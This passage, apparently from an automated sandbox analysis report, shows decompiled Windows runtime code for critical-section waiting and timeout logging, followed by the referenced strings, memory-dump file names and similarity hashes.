                                                							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                							_push(_t85);
                                                							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                							E00CC3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                							_t53 =  *_t85;
                                                							_t93 = _t92 + 0x20;
                                                							_t67 = _t67 + 1;
                                                							__eflags = _t53 - 0xffffffff;
                                                							if(_t53 != 0xffffffff) {
                                                								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                							}
                                                							__eflags = _t67 - 2;
                                                							if(_t67 > 2) {
                                                								__eflags = _t85 - 0xd520c0;
                                                								if(_t85 != 0xd520c0) {
                                                									_t76 = _a4;
                                                									__eflags = _a4 - _a8;
                                                									if(__eflags == 0) {
                                                										E00CF217A(_t71, __eflags, _t85);
                                                									}
                                                								}
                                                							}
                                                							_push("RTL: Re-Waiting\n");
                                                							_push(0);
                                                							_push(0x65);
                                                							_a8 = _a4;
                                                							E00CC3F92();
                                                							_t91 = _t93 + 0xc;
                                                							__eflags =  *0x7ffe0382;
                                                							if( *0x7ffe0382 != 0) {
                                                								goto L21;
                                                							}
                                                						}
                                                						goto L36;
                                                					}
                                                				} else {
                                                					return _t40;
                                                				}
                                                				L36:
                                                			}


































                                                Strings
                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00CD248D
                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00CD24BD
                                                • RTL: Re-Waiting, xrefs: 00CD24FA
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000008.00000002.698270211.0000000000C50000.00000040.00000001.sdmp
                                                • Associated: 00000008.00000002.698400307.0000000000D40000.00000040.00000001.sdmp
                                                • Associated: 00000008.00000002.698411864.0000000000D50000.00000040.00000001.sdmp
                                                • Associated: 00000008.00000002.698421886.0000000000D54000.00000040.00000001.sdmp
                                                • Associated: 00000008.00000002.698435583.0000000000D57000.00000040.00000001.sdmp
                                                • Associated: 00000008.00000002.698444149.0000000000D60000.00000040.00000001.sdmp
                                                • Associated: 00000008.00000002.698493714.0000000000DC0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                • API String ID: 0-3177188983
                                                • Opcode ID: 2dc3c9cf46c9b76998a1ca9f5d0fdd6d5af3bd34d70dd9e6d01dee7756bbe67c
                                                • Instruction ID: 45221ccde62c594bba6a8f2859c73c54296570d041c88568b0969182f6105a33
                                                • Opcode Fuzzy Hash: 2dc3c9cf46c9b76998a1ca9f5d0fdd6d5af3bd34d70dd9e6d01dee7756bbe67c
                                                • Instruction Fuzzy Hash: 62412C70600304ABCB24DF68DC89F6A77A8EF44720F20C616FA69D73C1D734EA419B60
                                                Uniqueness

                                                Uniqueness Score: -1.00%